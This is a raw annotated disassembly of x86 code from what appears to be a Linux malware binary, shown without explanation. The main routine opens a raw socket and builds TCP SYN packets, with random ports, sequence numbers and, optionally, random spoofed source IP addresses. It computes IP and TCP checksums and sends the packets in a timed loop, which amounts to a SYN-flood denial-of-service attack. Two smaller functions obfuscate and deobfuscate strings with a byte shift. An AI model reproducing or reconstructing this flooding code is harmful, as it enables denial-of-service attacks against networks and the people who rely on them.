-0xac(%ebp),%eax | 08049de0: push %eax | 08049de1: movzbl -0xa8(%ebp),%eax | 08049de8: push %eax | 08049de9: movzbl -0xa4(%ebp),%eax | 08049df0: push %eax | # Possible reference to rodata '%d.%d.%d.%d' 08049df1: push $0x806768a | 08049df6: lea -0x78(%ebp),%ebx | 08049df9: push %ebx | 08049dfa: call 0x0804f808 <_IO_sprintf> | 08049dff: push %ebx | 08049e00: call 0x0804ce8c | 08049e05: mov %eax,-0xc(%ebp) | 08049e08: add $0x1c,%esp | 08049e0b: movb $0x45,-0x38(%ebp) * 08049e0f: movw $0x2800,-0x36(%ebp) 08049e15: movb $0x0,-0x37(%ebp) 08049e19: push $0xff 08049e1e: push $0x3 08049e20: push $0x2 08049e22: call 0x08056cf4 08049e27: mov %eax,-0xc0(%ebp) 08049e2d: add $0xc,%esp 08049e30: test %eax,%eax 08049e32: jle 0x0804a178 * 08049e38: cmpl $0x0,0x20(%ebp) | 08049e3c: je 0x08049e72 *| 08049e3e: movzbl -0xbc(%ebp),%eax || 08049e45: push %eax || 08049e46: movzbl -0xb8(%ebp),%eax || 08049e4d: push %eax || 08049e4e: movzbl -0xb4(%ebp),%eax || 08049e55: push %eax || 08049e56: movzbl -0xb0(%ebp),%eax || 08049e5d: push %eax || # Possible reference to rodata '%d.%d.%d.%d' 08049e5e: push $0x806768a || 08049e63: lea -0x98(%ebp),%eax || 08049e69: push %eax || 08049e6a: call 0x0804f808 <_IO_sprintf> || 08049e6f: add $0x18,%esp || 08049e72: cmpl $0x0,0x38(%ebp) *| 08049e76: jne 0x08049e87 *| 08049e78: lea -0x78(%ebp),%eax || 08049e7b: push %eax || 08049e7c: call 0x0804ce8c || 08049e81: mov %eax,-0x28(%ebp) || 08049e84: add $0x4,%esp || 08049e87: movw $0x0,-0x32(%ebp) *| 08049e8d: movb $0x6,-0x2f(%ebp) | 08049e91: mov -0x17(%ebp),%al | 08049e94: and $0xef,%al | 08049e96: mov %al,-0x17(%ebp) | 08049e99: mov -0x18(%ebp),%al | 08049e9c: and $0xf,%al | 08049e9e: or $0x50,%al | 08049ea0: mov %al,-0x18(%ebp) | 08049ea3: movl $0x0,-0x1c(%ebp) | 08049eaa: and $0x50,%al | 08049eac: mov %al,-0x18(%ebp) | 08049eaf: movb $0x2,-0x17(%ebp) | 08049eb3: movw $0x0,-0x12(%ebp) | 08049eb9: mov 0x18(%ebp),%eax | 08049ebc: shl $0x8,%eax | 08049ebf: add 0x1c(%ebp),%ax | 08049ec3: xchg %al,%ah | 08049ec5: mov %ax,-0x22(%ebp) | 08049ec9: xor %edi,%edi | 08049ecb: movb $0x0,-0x50(%ebp) | 08049ecf: cmpl $0x0,0x38(%ebp) | 08049ed3: jne 0x08049edb *| 08049ed5: mov -0x28(%ebp),%eax || 08049ed8: mov %eax,-0x54(%ebp) || 08049edb: movb $0x6,-0x4f(%ebp) *| 08049edf: movw $0x1400,-0x4e(%ebp) | 08049ee5: xor %esi,%esi | 08049ee7: lea -0x58(%ebp),%ebx | 08049eea: mov %ebx,-0xc4(%ebp) | 08049ef0: movl $0x0,-0xcc(%ebp) ***| 08049efa: cmpl $0x0,0x38(%ebp) |||| 08049efe: je 0x08049f5b *|||| 08049f00: test %esi,%esi ||||| 08049f02: jg 0x08049f5b *||||| 08049f04: mov 0x3c(%ebp),%ebx |||||| 08049f07: push %ebx |||||| 08049f08: call 0x0804bf80 |||||| 08049f0d: mov %eax,%edx |||||| 08049f0f: add $0x4,%esp |||||| 08049f12: test %edx,%edx |||||| 08049f14: jne 0x08049f30 * |||||| 08049f16: push $0x258 | |||||| 08049f1b: call 0x080556cc | |||||| 08049f20: movl $0x1,-0xcc(%ebp) | |||||| 08049f2a: add $0x4,%esp | |||||| 08049f2d: jmp 0x08049f5b |*|||||| 08049f2f: nop |||||||| 08049f30: push $0x4 *||||||| 08049f32: lea -0x9c(%ebp),%eax ||||||| 08049f38: push %eax ||||||| 08049f39: mov 0x10(%edx),%eax ||||||| 08049f3c: mov (%eax),%eax ||||||| 08049f3e: push %eax ||||||| 08049f3f: call 0x08056480 ||||||| 08049f44: mov -0x9c(%ebp),%eax ||||||| 08049f4a: mov %eax,-0x28(%ebp) ||||||| 08049f4d: mov %eax,-0xc(%ebp) ||||||| 08049f50: mov %eax,-0x54(%ebp) ||||||| 08049f53: mov $0x9c40,%esi ||||||| 08049f58: add $0xc,%esp ||||||| 08049f5b: cmpl $0x0,-0xcc(%ebp) ***|||| 08049f62: jne 0x08049ef0 *||| 08049f64: call 0x08056058 ||| 08049f69: mov $0xc11,%ebx ||| 08049f6e: cltd ||| 08049f6f: idiv %ebx ||| 08049f71: mov %edx,%eax ||| 08049f73: add $0x2,%ah ||| 08049f76: xchg %al,%ah ||| 08049f78: mov %ax,-0x34(%ebp) ||| 08049f7c: call 0x08056058 ||| 08049f81: mov $0x579,%ebx ||| 08049f86: cltd ||| 08049f87: idiv %ebx ||| 08049f89: mov %edx,%eax ||| 08049f8b: add $0xc8,%ax ||| 08049f8f: xchg %al,%ah ||| 08049f91: mov %ax,-0x16(%ebp) ||| 08049f95: call 0x08056058 ||| 08049f9a: mov $0x9c40,%ebx ||| 08049f9f: cltd ||| 08049fa0: idiv %ebx ||| 08049fa2: mov %edx,%eax ||| 08049fa4: inc %ax ||| 08049fa6: xchg %al,%ah ||| 08049fa8: mov %ax,-0x24(%ebp) ||| 08049fac: call 0x08056058 ||| 08049fb1: mov $0x2625a00,%ebx ||| 08049fb6: cltd ||| 08049fb7: idiv %ebx ||| 08049fb9: lea 0x1(%edx),%eax ||| 08049fbc: xchg %al,%ah ||| 08049fbe: ror $0x10,%eax ||| 08049fc1: xchg %al,%ah ||| 08049fc3: mov %eax,-0x20(%ebp) ||| 08049fc6: call 0x08056058 ||| 08049fcb: mov $0x74,%ebx ||| 08049fd0: cltd ||| 08049fd1: idiv %ebx ||| 08049fd3: add $0x7d,%dl ||| 08049fd6: mov %dl,-0x30(%ebp) ||| 08049fd9: cmpl $0x0,0x20(%ebp) ||| 08049fdd: jne 0x0804a01c *||| 08049fdf: call 0x08055e38 <__random> |||| 08049fe4: mov $0xff,%ebx |||| 08049fe9: cltd |||| 08049fea: idiv %ebx |||| 08049fec: push %edx |||| 08049fed: call 0x08055e38 <__random> |||| 08049ff2: cltd |||| 08049ff3: idiv %ebx |||| 08049ff5: push %edx |||| 08049ff6: call 0x08055e38 <__random> |||| 08049ffb: cltd |||| 08049ffc: idiv %ebx |||| 08049ffe: push %edx |||| 08049fff: call 0x08055e38 <__random> |||| 0804a004: cltd |||| 0804a005: idiv %ebx |||| 0804a007: push %edx |||| # Possible reference to rodata '%u.%u.%u.%u' 0804a008: push $0x80678b0 |||| 0804a00d: lea -0x98(%ebp),%eax |||| 0804a013: push %eax |||| 0804a014: call 0x0804f808 <_IO_sprintf> |||| 0804a019: add $0x18,%esp |||| 0804a01c: lea -0x98(%ebp),%eax *||| 0804a022: push %eax ||| 0804a023: call 0x0804ce8c ||| 0804a028: mov %eax,-0x2c(%ebp) ||| 0804a02b: mov %eax,-0x58(%ebp) ||| 0804a02e: movw $0x0,-0x14(%ebp) ||| 0804a034: movw $0x0,-0x2e(%ebp) ||| 0804a03a: push $0x14 ||| 0804a03c: lea -0x4c(%ebp),%eax ||| 0804a03f: push %eax ||| 0804a040: lea -0x24(%ebp),%eax ||| 0804a043: push %eax ||| 0804a044: call 0x08056480 ||| 0804a049: add $0x10,%esp ||| 0804a04c: mov $0x20,%edx ||| 0804a051: mov -0xc4(%ebp),%ebx ||| 0804a057: mov %ebx,-0xcc(%ebp) ||| 0804a05d: xor %ecx,%ecx ||| 0804a05f: movw $0x0,-0x9e(%ebp) ||| 0804a068: mov -0xcc(%ebp),%ebx *||| 0804a06e: movzwl (%ebx),%eax |||| 0804a071: add %eax,%ecx |||| 0804a073: add $0x2,%ebx |||| 0804a076: mov %ebx,-0xcc(%ebp) |||| 0804a07c: add $-0x2,%edx |||| 0804a07f: cmp $0x1,%edx |||| 0804a082: jg 0x0804a068 *||| 0804a084: jne 0x0804a097 *||| 0804a086: mov (%ebx),%al |||| 0804a088: mov %al,-0x9e(%ebp) |||| 0804a08e: movzwl -0x9e(%ebp),%eax |||| 0804a095: add %eax,%ecx |||| 0804a097: mov %ecx,%edx *||| 0804a099: sar $0x10,%edx ||| 0804a09c: movzwl %cx,%eax ||| 0804a09f: lea (%eax,%edx,1),%ecx ||| 0804a0a2: mov %ecx,%eax ||| 0804a0a4: sar $0x10,%eax ||| 0804a0a7: add %eax,%ecx ||| 0804a0a9: mov %ecx,%eax ||| 0804a0ab: not %ax ||| 0804a0ae: mov %ax,-0x9e(%ebp) ||| 0804a0b5: mov %ax,-0x14(%ebp) ||| 0804a0b9: mov $0x14,%edx ||| 0804a0be: lea -0x38(%ebp),%ebx ||| 0804a0c1: mov %ebx,-0xcc(%ebp) ||| 0804a0c7: xor %ecx,%ecx ||| 0804a0c9: movw $0x0,-0x9e(%ebp) ||| 0804a0d2: lea (%esi),%esi ||| 0804a0d4: mov -0xcc(%ebp),%ebx *||| 0804a0da: movzwl (%ebx),%eax |||| 0804a0dd: add %eax,%ecx |||| 0804a0df: add $0x2,%ebx |||| 0804a0e2: mov %ebx,-0xcc(%ebp) |||| 0804a0e8: add $-0x2,%edx |||| 0804a0eb: cmp $0x1,%edx |||| 0804a0ee: jg 0x0804a0d4 *||| 0804a0f0: jne 0x0804a103 *||| 0804a0f2: mov (%ebx),%al |||| 0804a0f4: mov %al,-0x9e(%ebp) |||| 0804a0fa: movzwl -0x9e(%ebp),%eax |||| 0804a101: add %eax,%ecx |||| 0804a103: mov %ecx,%edx *||| 0804a105: sar $0x10,%edx ||| 0804a108: movzwl %cx,%eax ||| 0804a10b: lea (%eax,%edx,1),%ecx ||| 0804a10e: mov %ecx,%eax ||| 0804a110: sar $0x10,%eax ||| 0804a113: add %eax,%ecx ||| 0804a115: mov %ecx,%eax ||| 0804a117: not %ax ||| 0804a11a: mov %ax,-0x9e(%ebp) ||| 0804a121: mov %ax,-0x2e(%ebp) ||| 0804a125: push $0x10 ||| 0804a127: lea -0x10(%ebp),%eax ||| 0804a12a: push %eax ||| 0804a12b: push $0x0 ||| 0804a12d: push $0x28 ||| 0804a12f: lea -0x38(%ebp),%eax ||| 0804a132: push %eax ||| 0804a133: mov -0xc0(%ebp),%ebx ||| 0804a139: push %ebx ||| 0804a13a: call 0x08056c3c ||| 0804a13f: add $0x18,%esp ||| 0804a142: cmpl $0x0,0x34(%ebp) ||| 0804a146: jne 0x0804a154 *||| 0804a148: push $0x12c |||| 0804a14d: call 0x080555b0 |||| 0804a152: jmp 0x0804a165 *|||| 0804a154: cmp %edi,0x34(%ebp) |*||| 0804a157: jne 0x0804a170 |*||| 0804a159: push $0x12c ||||| 0804a15e: call 0x080555b0 ||||| 0804a163: xor %edi,%edi ||||| 0804a165: dec %esi *|||| 0804a166: add $0x4,%esp |||| 0804a169: jmp 0x08049ef0 |*|| 0804a16e: lea (%esi),%esi | || 0804a170: inc %edi * || 0804a171: jmp 0x08049ef0 *| 0804a176: lea (%esi),%esi | # Possible reference to data in bss 0804a178: movl $0x0,0x807e774 * 0804a182: xor %eax,%eax 0804a184: lea -0xd8(%ebp),%esp 0804a18a: pop %ebx 0804a18b: pop %esi 0804a18c: pop %edi 0804a18d: mov %ebp,%esp 0804a18f: pop %ebp 0804a190: ret 0804a191: lea 0x0(%esi),%esi # 0804a194 : 0804a194: push %ebp 0804a195: mov %esp,%ebp 0804a197: push %edi 0804a198: push %esi 0804a199: push %ebx 0804a19a: mov 0x8(%ebp),%edi 0804a19d: mov 0xc(%ebp),%esi 0804a1a0: mov 0x10(%ebp),%ebx # Possible reference to rodata '' 0804a1a3: mov 0x80675e5,%al 0804a1a9: mov %al,(%ebx) 0804a1ab: mov (%esi),%al 0804a1ad: add $0x17,%al 0804a1af: movsbl %al,%eax 0804a1b2: push %eax # Possible reference to rodata '%c' 0804a1b3: push $0x80678bc 0804a1b8: push %ebx 0804a1b9: call 0x0804f808 <_IO_sprintf> 0804a1be: mov $0x1,%ecx 0804a1c3: cmp %edi,%ecx 0804a1c5: je 0x0804a1dd * 0804a1c7: nop | 0804a1c8: movzbl -0x1(%ebx,%ecx,1),%edx *| 0804a1cd: movzbl (%ecx,%esi,1),%eax || 0804a1d1: lea 0x17(%edx,%eax,1),%eax || 0804a1d5: mov %al,(%ecx,%ebx,1) || 0804a1d8: inc %ecx || 0804a1d9: cmp %edi,%ecx || 0804a1db: jne 0x0804a1c8 *| 0804a1dd: lea -0xc(%ebp),%esp * 0804a1e0: pop %ebx 0804a1e1: pop %esi 0804a1e2: pop %edi 0804a1e3: mov %ebp,%esp 0804a1e5: pop %ebp 0804a1e6: ret 0804a1e7: nop # 0804a1e8 : 0804a1e8: push %ebp 0804a1e9: mov %esp,%ebp 0804a1eb: sub $0x4,%esp 0804a1ee: push %edi 0804a1ef: push %esi 0804a1f0: push %ebx 0804a1f1: mov 0x8(%ebp),%edi 0804a1f4: lea -0x1(%edi),%ebx 0804a1f7: lea 0x3(%edi),%eax 0804a1fa: and $0xfc,%al 0804a1fc: sub %eax,%esp 0804a1fe: mov %esp,-0x4(%ebp) # Possible reference to rodata '' 0804a201: mov 0x80675e5,%al 0804a207: mov 0x10(%ebp),%esi 0804a20a: mov %al,(%esi) 0804a20c: test %ebx,%ebx 0804a20e: jl 0x0804a29b * 0804a214: lea -0x1(%ebx),%edx *| 0804a217: test %ebx,%ebx || 0804a219: je 0x0804a22c *|| 0804a21b: mov 0xc(%ebp),%esi ||| 0804a21e: movzbl (%ebx,%esi,1),%eax ||| 0804a222: movzbl (%edx,%esi,1),%edx ||| 0804a226: sub %edx,%eax ||| 0804a228: jmp 0x0804a232 *||| 0804a22a: lea (%esi),%esi |||| 0804a22c: mov 0xc(%ebp),%esi |*|| 0804a22f: movzbl (%esi),%eax | || 0804a232: lea -0x17(%eax),%ecx * || 0804a235: test %ecx,%ecx || 0804a237: jge 0x0804a244 *|| 0804a239: lea 0x0(%esi),%esi ||| 0804a23c: add $0x100,%ecx *||| 0804a242: js 0x0804a23c *||| 0804a244: xor %edx,%edx *|| 0804a246: cmp %edi,%edx || 0804a248: jge 0x0804a25d *|| 0804a24a: lea (%esi),%esi ||| 0804a24c: mov 0x10(%ebp),%esi *||| 0804a24f: mov (%edx,%esi,1),%al |||| 0804a252: mov -0x4(%ebp),%esi |||| 0804a255: mov %al,(%edx,%esi,1) |||| 0804a258: inc %edx |||| 0804a259: cmp %edi,%edx |||| 0804a25b: jl 0x0804a24c *||| 0804a25d: mov 0x10(%ebp),%esi *|| 0804a260: mov %cl,(%esi) || 0804a262: mov $0x1,%edx || 0804a267: cmp %edi,%edx || 0804a269: jge 0x0804a27e *|| 0804a26b: nop ||| 0804a26c: mov -0x4(%ebp),%esi *||| 0804a26f: mov -0x1(%edx,%esi,1),%al |||| 0804a273: mov 0x10(%ebp),%esi |||| 0804a276: mov %al,(%edx,%esi,1) |||| 0804a279: inc %edx |||| 0804a27a: cmp %edi,%edx |||| 0804a27c: jl 0x0804a26c *||| 0804a27e: mov -0x4(%ebp),%esi *|| 0804a281: push %esi || 0804a282: push %ecx || # Possible reference to rodata '%c%s' 0804a283: push $0x80678bf || 0804a288: mov 0x10(%ebp),%esi || 0804a28b: push %esi || 0804a28c: call 0x0804f808 <_IO_sprintf> || 0804a291: add $0x10,%esp || 0804a294: dec %ebx || 0804a295: jns 0x0804a214 *| 0804a29b: lea -0x10(%ebp),%esp * 0804a29e: pop %ebx 0804a29f: pop %esi 0804a2a0: pop %edi 0804a2a1: mov %ebp,%esp 0804a2a3: pop %ebp 0804a2a4: ret 0804a2a5: nop 0804a2a6: nop 0804a2a7: nop # 080675a8 <__do_global_dtors_aux>: 080675a8: push %ebx 080675a9: mov $0x80792ac,%ebx 080675ae: cmpl $-0x1,0x80792ac 080675b5: je 0x080675c4 * 080675b7: nop | 080675b8: mov (%ebx),%eax *| 080675ba: call *%eax || 080675bc: add $-0x4,%ebx || 080675bf: cmpl $-0x1,(%ebx) || 080675c2: jne 0x080675b8 *| 080675c4: pop %ebx * 080675c5: ret 080675c6: lea (%esi),%esi 080675c8: ret 080675c9: nop 080675ca: nop 080675cb: nop